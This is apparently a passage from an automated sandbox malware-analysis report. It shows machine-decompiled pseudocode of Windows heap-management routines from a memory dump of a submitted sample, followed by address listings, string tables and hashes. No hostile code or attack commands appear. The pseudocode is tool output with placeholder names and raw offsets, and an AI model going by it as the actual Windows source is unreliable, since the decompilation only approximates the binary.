								_push("HEAP: ");
								E017EB150();
							} else {
								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E017EB150();
							__eflags =  *0x18d7bc8;
							if( *0x18d7bc8 == 0) {
								__eflags = 0;
								E018A2073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x18d8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E017EB150();
												} else {
													E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E017EB150();
												__eflags =  *0x18d7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E018A2073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E018AA80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E0180A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0180B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0180A830(_t553, _v64, _v24);
								_t286 = E01807D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E01807D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E018A1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E01807D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E01807D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E018A1411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0181174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0180B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E01807D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E018A14FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E018099BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0180A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0181ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                        0x0180a309
                                                        0x0180a316
                                                        0x0180a319
                                                        0x0180a31d
                                                        0x0180a32d
                                                        0x0180a331
                                                        0x01851e0d
                                                        0x01851e10
                                                        0x0180a3cb
                                                        0x0180a3cb
                                                        0x0180a3bd
                                                        0x0180a3c3
                                                        0x0180a3c3
                                                        0x0180a33a
                                                        0x01851e17
                                                        0x01851e1b
                                                        0x01851e1d
                                                        0x01851e2f
                                                        0x01851e34
                                                        0x01851e36
                                                        0x01851e3c
                                                        0x01851e3c
                                                        0x01851e3c
                                                        0x01851e3c
                                                        0x01851e36
                                                        0x01851e42
                                                        0x01851e45
                                                        0x01851e47
                                                        0x0180a3f8
                                                        0x0180a3f8
                                                        0x0180a3fb
                                                        0x0180a3fd
                                                        0x01851e50
                                                        0x0180a403
                                                        0x0180a411
                                                        0x0180a411
                                                        0x0180a411
                                                        0x0180a41e
                                                        0x0180a420
                                                        0x0180a424
                                                        0x0180a427
                                                        0x0180a7c9
                                                        0x0180a7cd
                                                        0x0180a7d2
                                                        0x0180a7d9
                                                        0x0180a7e0
                                                        0x0180a7e3
                                                        0x0180a7ed
                                                        0x0180a7f3
                                                        0x0180a7f9
                                                        0x0180a7ff
                                                        0x0180a802
                                                        0x0180a807
                                                        0x0180a809
                                                        0x0180a809
                                                        0x0180a809
                                                        0x0180a80f
                                                        0x0180a80f
                                                        0x0180a812
                                                        0x0180a81c
                                                        0x0180a821
                                                        0x0180a824
                                                        0x0180a42d
                                                        0x0180a42d
                                                        0x0180a42d
                                                        0x0180a42d
                                                        0x0180a42d
                                                        0x0180a436
                                                        0x0180a43a
                                                        0x0180a609
                                                        0x0180a60d
                                                        0x0180a612
                                                        0x0180a616
                                                        0x0180a61a
                                                        0x01851e57
                                                        0x01851e59
                                                        0x00000000
                                                        0x00000000
                                                        0x01851e5f
                                                        0x0180a620
                                                        0x0180a627
                                                        0x01851e64
                                                        0x01851e66
                                                        0x01851e6c
                                                        0x01851e72
                                                        0x01851e76
                                                        0x01851e95
                                                        0x01851e9a
                                                        0x01851e78
                                                        0x01851e8d
                                                        0x01851e92
                                                        0x01851ea0
                                                        0x01851ea5
                                                        0x01851eaa
                                                        0x01851eb2
                                                        0x01851eb6
                                                        0x01851eb9
                                                        0x01851eb9
                                                        0x01851ebe
                                                        0x01851ec2
                                                        0x01851ec2
                                                        0x01851e66
                                                        0x0180a62d
                                                        0x0180a633
                                                        0x0180a636
                                                        0x0180a63a
                                                        0x0180a63c
                                                        0x0180a640
                                                        0x0180a642
                                                        0x0180a644
                                                        0x0180a644
                                                        0x0180a644
                                                        0x0180a64d
                                                        0x0180a64d
                                                        0x0180a651
                                                        0x0180a655
                                                        0x01851eca
                                                        0x01851ed1
                                                        0x00000000
                                                        0x00000000
                                                        0x01851ed7
                                                        0x00000000
                                                        0x0180a65b
                                                        0x0180a669
                                                        0x0180a66e
                                                        0x0180a670
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a676
                                                        0x0180a67b
                                                        0x0180a680
                                                        0x0180a682
                                                        0x01851f1a
                                                        0x0180a688
                                                        0x0180a688
                                                        0x0180a688
                                                        0x0180a68a
                                                        0x0180a68d
                                                        0x01851f24
                                                        0x01851f2a
                                                        0x01851f31
                                                        0x01851f43
                                                        0x01851f43
                                                        0x01851f31
                                                        0x0180a693
                                                        0x0180a697
                                                        0x0180a69d
                                                        0x0180a6a0
                                                        0x0180a6a6
                                                        0x0180a6a8
                                                        0x0180a6a8
                                                        0x0180a6a8
                                                        0x0180a6a8
                                                        0x0180a6b2
                                                        0x0180a6b7
                                                        0x0180a6c1
                                                        0x0180a6c6
                                                        0x0180a6d2
                                                        0x0180a6d9
                                                        0x0180a6e3
                                                        0x0180a6e6
                                                        0x0180a6eb
                                                        0x0180a6ed
                                                        0x0180a6ed
                                                        0x0180a6ed
                                                        0x0180a6ed
                                                        0x0180a6f3
                                                        0x0180a6f8
                                                        0x0180a702
                                                        0x0180a70a
                                                        0x0180a70e
                                                        0x0180a71a
                                                        0x0180a71e
                                                        0x01851fcb
                                                        0x01851fcf
                                                        0x01851fdd
                                                        0x01851fe3
                                                        0x01851fe3
                                                        0x0180a724
                                                        0x0180a728
                                                        0x0180a72a
                                                        0x0180a72d
                                                        0x0180a737
                                                        0x0180a73a
                                                        0x0180a73c
                                                        0x0180a742
                                                        0x0180a748
                                                        0x01851f4d
                                                        0x01851f50
                                                        0x01851f56
                                                        0x01851f5c
                                                        0x01851f5f
                                                        0x01851f7e
                                                        0x01851f83
                                                        0x01851f61
                                                        0x01851f76
                                                        0x01851f7b
                                                        0x01851f89
                                                        0x01851f8e
                                                        0x01851f93
                                                        0x01851f94
                                                        0x01851f9a
                                                        0x01851f9c
                                                        0x01851f9e
                                                        0x01851fa1
                                                        0x01851fa1
                                                        0x01851fa6
                                                        0x01851fa6
                                                        0x01851f50
                                                        0x0180a74e
                                                        0x0180a751
                                                        0x0180a754
                                                        0x0180a75d
                                                        0x0180a75e
                                                        0x0180a762
                                                        0x0180a767
                                                        0x01851faf
                                                        0x01851fb0
                                                        0x01851fb9
                                                        0x01851fbe
                                                        0x01851fc2
                                                        0x01851fc2
                                                        0x0180a76d
                                                        0x0180a76d
                                                        0x0180a775
                                                        0x0180a778
                                                        0x0180a77d
                                                        0x0180a77d
                                                        0x0180a71e
                                                        0x0180a782
                                                        0x0180a787
                                                        0x0180a789
                                                        0x01851ff3
                                                        0x0180a78f
                                                        0x0180a78f
                                                        0x0180a78f
                                                        0x0180a791
                                                        0x0180a794
                                                        0x01851ffd
                                                        0x01852006
                                                        0x0185200c
                                                        0x01852017
                                                        0x01852019
                                                        0x01852024
                                                        0x01852024
                                                        0x01852024
                                                        0x01852047
                                                        0x01852047
                                                        0x0185200c
                                                        0x0180a79a
                                                        0x0180a79f
                                                        0x0180a7a4
                                                        0x0180a7a9
                                                        0x0180a7ab
                                                        0x0185205a
                                                        0x0180a7b1
                                                        0x0180a7b1
                                                        0x0180a7b1
                                                        0x0180a7b3
                                                        0x0180a7b6
                                                        0x00000000
                                                        0x0180a7bc
                                                        0x01852066
                                                        0x01852068
                                                        0x01852073
                                                        0x01852073
                                                        0x01852073
                                                        0x01852078
                                                        0x01852079
                                                        0x0185207d
                                                        0x00000000
                                                        0x0185207d
                                                        0x0180a7b6
                                                        0x0180a440
                                                        0x0180a440
                                                        0x0180a440
                                                        0x0180a446
                                                        0x0180a44c
                                                        0x0180a44f
                                                        0x0180a453
                                                        0x0180a455
                                                        0x018520b3
                                                        0x018520b9
                                                        0x018520b9
                                                        0x0180a45d
                                                        0x0180a460
                                                        0x0180a464
                                                        0x0180a466
                                                        0x0180a46b
                                                        0x0180a46f
                                                        0x0180a471
                                                        0x0180a471
                                                        0x0180a471
                                                        0x0180a474
                                                        0x0180a479
                                                        0x0180a47d
                                                        0x0180a47f
                                                        0x01852229
                                                        0x0185222f
                                                        0x0180a3c8
                                                        0x0180a3c8
                                                        0x0180a3ca
                                                        0x0180a3ca
                                                        0x00000000
                                                        0x0180a3ca
                                                        0x01852235
                                                        0x0185223a
                                                        0x0185223a
                                                        0x00000000
                                                        0x00000000
                                                        0x01852240
                                                        0x01852246
                                                        0x0185224a
                                                        0x01852269
                                                        0x0185226e
                                                        0x0185224c
                                                        0x01852261
                                                        0x01852266
                                                        0x01852274
                                                        0x01852279
                                                        0x0185227e
                                                        0x01852286
                                                        0x01852288
                                                        0x0185228d
                                                        0x0185228d
                                                        0x01852292
                                                        0x01852292
                                                        0x01852295
                                                        0x01852295
                                                        0x00000000
                                                        0x01852295
                                                        0x0180a485
                                                        0x0180a489
                                                        0x0180a48b
                                                        0x0180a48f
                                                        0x0180a493
                                                        0x0180a497
                                                        0x0180a49b
                                                        0x0180a4bb
                                                        0x0180a4bb
                                                        0x0180a4bd
                                                        0x0180a4ff
                                                        0x0180a4ff
                                                        0x0180a501
                                                        0x0180a505
                                                        0x0180a50f
                                                        0x0180a517
                                                        0x0180a51b
                                                        0x0180a527
                                                        0x0180a52b
                                                        0x01852182
                                                        0x01852185
                                                        0x01852193
                                                        0x01852199
                                                        0x01852199
                                                        0x0180a531
                                                        0x0180a535
                                                        0x0180a538
                                                        0x0180a548
                                                        0x0180a54b
                                                        0x0180a54d
                                                        0x0180a553
                                                        0x0180a559
                                                        0x01852100
                                                        0x01852103
                                                        0x01852109
                                                        0x0185210f
                                                        0x01852112
                                                        0x01852131
                                                        0x01852136
                                                        0x01852114
                                                        0x01852129
                                                        0x0185212e
                                                        0x0185213c
                                                        0x01852141
                                                        0x01852147
                                                        0x0185214d
                                                        0x01852151
                                                        0x01852154
                                                        0x01852154
                                                        0x01852159
                                                        0x01852159
                                                        0x01852103
                                                        0x0180a55f
                                                        0x0180a562
                                                        0x0180a565
                                                        0x0180a567
                                                        0x01852162
                                                        0x0180a56d
                                                        0x0180a574
                                                        0x0180a575
                                                        0x0180a579
                                                        0x0180a57e
                                                        0x01852169
                                                        0x0185216a
                                                        0x01852170
                                                        0x01852175
                                                        0x01852179
                                                        0x01852179
                                                        0x0180a57e
                                                        0x0180a584
                                                        0x0180a58f
                                                        0x0180a58f
                                                        0x0180a52b
                                                        0x0180a5ad
                                                        0x0180a5bc
                                                        0x0180a5c1
                                                        0x0180a5c6
                                                        0x0180a5cb
                                                        0x0180a5cd
                                                        0x018521a9
                                                        0x0180a5d3
                                                        0x0180a5d3
                                                        0x0180a5d3
                                                        0x0180a5d5
                                                        0x0180a5d8
                                                        0x018521b3
                                                        0x018521bc
                                                        0x018521c2
                                                        0x018521cd
                                                        0x018521cf
                                                        0x018521da
                                                        0x018521da
                                                        0x018521da
                                                        0x018521f7
                                                        0x018521f7
                                                        0x018521c2
                                                        0x0180a5de
                                                        0x0180a5e3
                                                        0x0180a5e8
                                                        0x0180a5ea
                                                        0x0185220a
                                                        0x0180a5f0
                                                        0x0180a5f0
                                                        0x0180a5f0
                                                        0x0180a5f2
                                                        0x0180a5f5
                                                        0x01852219
                                                        0x0185221b
                                                        0x0185208c
                                                        0x0185208c
                                                        0x0185208c
                                                        0x01852095
                                                        0x01852096
                                                        0x01852097
                                                        0x01852098
                                                        0x018520a4
                                                        0x018520a5
                                                        0x018520a9
                                                        0x018520a9
                                                        0x00000000
                                                        0x0180a5f5
                                                        0x0180a4bf
                                                        0x0180a4d3
                                                        0x0180a4d8
                                                        0x0180a4da
                                                        0x01851ede
                                                        0x01851ede
                                                        0x01851ee4
                                                        0x01851ee9
                                                        0x00000000
                                                        0x00000000
                                                        0x01851f07
                                                        0x00000000
                                                        0x01851f07
                                                        0x0180a4e0
                                                        0x0180a4e5
                                                        0x0180a4e7
                                                        0x018520cb
                                                        0x0180a4ed
                                                        0x0180a4ed
                                                        0x0180a4ed
                                                        0x0180a4f2
                                                        0x0180a4f5
                                                        0x018520d5
                                                        0x018520de
                                                        0x018520e4
                                                        0x018520f6
                                                        0x018520f6
                                                        0x018520e4
                                                        0x0180a4fb
                                                        0x00000000
                                                        0x0180a4fb
                                                        0x0180a4a1
                                                        0x0180a4a4
                                                        0x0180a4a8
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a4aa
                                                        0x0180a4ac
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a4b2
                                                        0x0180a4b5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a4b5
                                                        0x0180a43a
                                                        0x0180a340
                                                        0x0180a346
                                                        0x0180a600
                                                        0x00000000
                                                        0x0180a600
                                                        0x0180a34f
                                                        0x0180a351
                                                        0x0180a358
                                                        0x0180a3c6
                                                        0x00000000
                                                        0x0180a371
                                                        0x0180a37a
                                                        0x0180a37f
                                                        0x0180a382
                                                        0x0180a384
                                                        0x0180a394
                                                        0x00000000
                                                        0x0180a396
                                                        0x0180a399
                                                        0x0180a3a7
                                                        0x0180a3b0
                                                        0x0180a3b4
                                                        0x0180a3bb
                                                        0x0180a3d2
                                                        0x0180a3da
                                                        0x0180a3df
                                                        0x0180a3e1
                                                        0x0180a3e5
                                                        0x0180a3ea
                                                        0x0180a3f0
                                                        0x0180a3f0
                                                        0x0180a3e1
                                                        0x00000000
                                                        0x0180a3bb
                                                        0x0180a394

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-523794902
                                                        • Opcode ID: 4228ad90d454caf46228d07a99adb210c05fdc5d9ff5d9d6e5360c461cb5d6cb
                                                        • Instruction ID: ebb9458fe18c917cbf2a01b899234760be1fe542d344c7ca658b99529b91122b
                                                        • Opcode Fuzzy Hash: 4228ad90d454caf46228d07a99adb210c05fdc5d9ff5d9d6e5360c461cb5d6cb
                                                        • Instruction Fuzzy Hash: 9342E1312057859FD75ACF28C888B2ABBE6FF88704F04496DE986CB391D734DA41CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018A2D82 Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E018A2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x18c0e80);
				E0183D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E017E40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E018A30C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E017EB150();
						} else {
							E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E017EB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E017FEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E018A4496(_t181, 0);
						_t177 = E01804620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E018A49A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0189FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E017E1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E018116C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E018A4496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x18d6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x18d6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x18d6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E017EB150();
								} else {
									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0188D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E017EB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E017EB150();
								} else {
									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E017EB150("Just allocated block at %p for %Ix bytes\n",  *0x18d6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x18d6378 = 1;
									 *0x18d60c0 = 0;
									asm("int3");
									 *0x18d6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x18d5708; // 0x0
					 *0x18db1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E0183D130(0, _t177, _t181);
				}
			}





















                                                        0x018a2d82
                                                        0x018a2d84
                                                        0x018a2d89
                                                        0x018a2d8e
                                                        0x018a2d90
                                                        0x018a2d92
                                                        0x018a2d97
                                                        0x018a2d9a
                                                        0x018a2da4
                                                        0x018a2dc0
                                                        0x018a2dc3
                                                        0x018a2dd1
                                                        0x018a2dd6
                                                        0x018a2dd8
                                                        0x018a30a7
                                                        0x018a30a7
                                                        0x018a30aa
                                                        0x018a30aa
                                                        0x018a30ad
                                                        0x018a30b4
                                                        0x00000000
                                                        0x018a30b9
                                                        0x018a2de3
                                                        0x018a2de8
                                                        0x018a2deb
                                                        0x018a2dee
                                                        0x018a2df1
                                                        0x018a2df3
                                                        0x018a2dfb
                                                        0x018a2dfb
                                                        0x018a2df5
                                                        0x018a2df5
                                                        0x018a2df5
                                                        0x018a2e04
                                                        0x018a2e0a
                                                        0x018a2e0d
                                                        0x018a2e11
                                                        0x018a2e11
                                                        0x018a2e12
                                                        0x018a2e15
                                                        0x018a2e18
                                                        0x018a2e1a
                                                        0x018a3027
                                                        0x018a3027
                                                        0x018a302d
                                                        0x018a3030
                                                        0x018a304f
                                                        0x018a3054
                                                        0x018a3032
                                                        0x018a3047
                                                        0x018a304c
                                                        0x018a305a
                                                        0x018a3063
                                                        0x00000000
                                                        0x018a2e20
                                                        0x018a2e20
                                                        0x018a2e23
                                                        0x00000000
                                                        0x00000000
                                                        0x018a2e29
                                                        0x018a2e2b
                                                        0x018a2e47
                                                        0x018a2e2d
                                                        0x018a2e33
                                                        0x018a2e38
                                                        0x018a2e3f
                                                        0x018a2e42
                                                        0x018a2e42
                                                        0x018a2e4e
                                                        0x018a2e5d
                                                        0x018a2e5f
                                                        0x018a2e62
                                                        0x018a2e66
                                                        0x018a2e6b
                                                        0x018a2e6d
                                                        0x00000000
                                                        0x018a2e73
                                                        0x018a2e73
                                                        0x018a2e76
                                                        0x018a2e7a
                                                        0x018a2e83
                                                        0x018a2e83
                                                        0x018a2e83
                                                        0x018a2e85
                                                        0x018a2e87
                                                        0x018a2e8a
                                                        0x018a2e8d
                                                        0x018a2e92
                                                        0x018a2e9c
                                                        0x018a2e9f
                                                        0x018a2ea1
                                                        0x018a2ea2
                                                        0x018a2ea6
                                                        0x018a2ea6
                                                        0x018a2e9f
                                                        0x018a2eab
                                                        0x018a2eaf
                                                        0x018a2edf
                                                        0x018a2ee2
                                                        0x018a2ee5
